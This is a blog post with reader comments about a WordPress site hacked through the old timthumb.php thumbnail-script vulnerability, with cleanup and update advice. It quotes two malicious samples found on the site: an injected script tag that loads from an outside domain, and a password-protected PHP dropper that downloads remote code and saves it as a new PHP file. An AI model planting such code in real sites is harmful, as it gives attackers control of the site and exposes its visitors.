WordPress sites using Timthumb.php is Prone to Hacking [Almost Every Themes]

Today one of my Client pinged me and told me that he is unable to login to his Wp-admin. His wp-admin was giving some error as mentioned below:

“warning: Cannot modify header information – headers already sent by (output started at /home/stony/public_html/wp-settings.php:748) in /home/stony/public_html/wp-includes/pluggable.php on line 868

When I logged into client site via FTP, I see some of the files were modified and some weird php files were added. The first weird code was found in index.php at the root of WordPress installation. Which has code


[php]echo’<script language="javascript" SRC="http://superpuperdomain.com/count.php?ref=’.urlencode($_SERVER[‘HTTP_REFERER’]) .’"></script>’; ?>[/php]

Then in plugin folder there was a file call upd.php which has following codes

[php]$file = $_GET[‘file’]; <br />$pass = $_GET[‘pass’]; <br />$true = ‘1c383cd30b7c298ab50293adfecb7b18′; <br />if ($pass == $true){ </p> <p>$ch = curl_init($file); <br />curl_setopt($ch,CURLOPT_RETURNTRANSFER,true); <br />curl_setopt($ch, CURLOPT_HEADER, 0); <br />curl_setopt($ch, CURLOPT_TIMEOUT, 5); <br />$shell = curl_exec($ch); <br />curl_close($ch); </p> <p>$tmp = md5(rand(0,10000)); </p> <p>$f = fopen($tmp.’.php’,"w"); <br />fputs($f,$shell); <br />fclose($f);</p> <p>[/php]

Well that’s not all, there are many such other files which were infected. The reason for this hacking is Remote injection due to one vulnerability in timthumb.php.

What is Timthumb.php?

Timthumb.php is one of the most popular script to auto-generate thumbnail and it’s being used by almost all the popular premium WordPress theme club, many sites are getting infected due to this hack. The vulnerability in timthumb.php script allows hacker to upload an arbitrary php code in the cache directory of timthumb script and execute it. Once hacker execute this php file, he gets almost all the control of your site and he can do anything. In most of the cases you will see, your site is getting redirected or some ads and popup will appear on your site. In my client case, it’s wp-admin is inaccessible.

So what’s the solution to this timthumb.php Hack?

Very first thing which you should do is scan your Blog or you can ask your hosting company to run a scan. Delete all unused themes and plugins. Update all plugins and themes to latest version. If you using a free and outdated theme, you should switch to any premium WordPress theme or any free theme which keep getting constant updates. My recommendation grab Thesis theme which is well supported by the community and constantly updated. You can manually reinstall WordPress, update your theme and most imp. update the timthumb.php file. Author of this script has already updated the new file, which you can grab from here. Once done, recheck all files and check if there is any trace of hacked code. You can use some security WordPress plugin to see if any traces of hacked file is left or not.

Even if you are not hacked or using an old version of Theme, I would suggest you to update your theme to latest version or atleast update your timthumb.php. Always remember, prevention is better than cure.

In case if you are not technically sound and not familiar with FTP and fixing this issue, you can get in touch via our WordPress services page to let our team fix your site.

Subscribe on Youtube

Article By
Harsh Agrawal is a blog scientist and a passionate blogger. He is blogging since 2008 & writes about Blogging, SEO, Make money online & tech. His blog, ShoutMeLoud receives 1 million Pageviews/month and have over 700K subscribers.


COMMENTs ( 20 )

  1. Sahil Kotak says

    Yeah, I found such vulnerable files in wordpress many times. They are mostly some numbers.php (4347623.php or something like that).

  2. Vijay says

    Hi Harsh,
    Thanks for the info. The file version above 1.09 and below 1.35 is vulnerable to security attacks. I have updated r=necessary files to latest version.

    One question:
    There is one file named “timthumb.php.svn-base” having only 4 lines in it. Is it something insecure to keep as is or needs to be updated? and What info it has?


  3. Siddharth says

    Not sure about it, but people using Brute force attack often to hack into WP.. few of my friends suffered as well.. Restricting “WP-admin” folder to particular IP might solve such Admin problems i guess.

  4. Saugat Adhikari says

    I have the same issue. I just log in into wordpress directory with wp-login.php and reinstall the update from admin page. It works for me. :)

  5. Shariq says

    Thanks to Woo Themes. They mailed all their customers and notified about security risk. They instantly updated their framework including timthumb . Users can easily update framework via their theme option panel.

  6. Amy says

    As far as I know, Timthumb code in Thesis (lib/scripts) is not the same with the one available at googlecode (Timthumb old version). So is it okay to just copy like that?

    Of course the new version of Timthumb (googlecode) has new securities added.

    Is your client using Thesis or did he used Timthumb from googlecode (old version)?

  7. says

    @Rakesh That’s nice that you using your own theme and I hope you not using any plugin to generate thumbnail or anything like that. If yes, update those plugins..

    @Prem @Fahad
    Glad I could help..Thanks for your comment.. :)

  8. Fahad says

    Thanks a lot Harsh, well my theme was also using timthumb.php file and was outdated, your post helped in securing my blog, hurrah updated to the latest version.

  9. rakesh kumar says

    Thanks a lot for this update. I have my own developed wordpress theme on my website and i have overall control on that theme so, at-last , my hard work is now paying for me. At-least i have not to worry about this security hole.

  10. Manendra says

    Harsh I am using Thesis theme can I update this timthumb.php code which you provided..?? in this root directory “thesis_18/lib/scripts/thumb.php

  11. bhushan says

    thanks harsh for reply i am using mystique theme… but whenever i update my theme i lost my plugins :(

  12. bhushan says

    omg.. but while i update my theme it seems all plugins damaged and all widgets are useless.. any solution of other way to update without any problem?

    • says

      What theme are you using? If you update the theme, I believe you won’t miss out the widgets. Or if you wanna be fail safe, simply drag and drop your widgets to inactive widgets tab, install new theme and put the widgets back.

  13. Vivek Parmar says

    That’s sad to hear that one of your client becomes the victim. That’s the reason why i use premium themes like Thesis and other popular framework :)

    • says

      @Vivek My client is just an example, it could be anyone who is using outdated timthumb.php script or using any outdated WordPress theme. Even many premium theme club has updated their theme with updated timthumb.php script. So quick suggestion is update your timthumb script else if your theme club has rolled out an update, update your theme.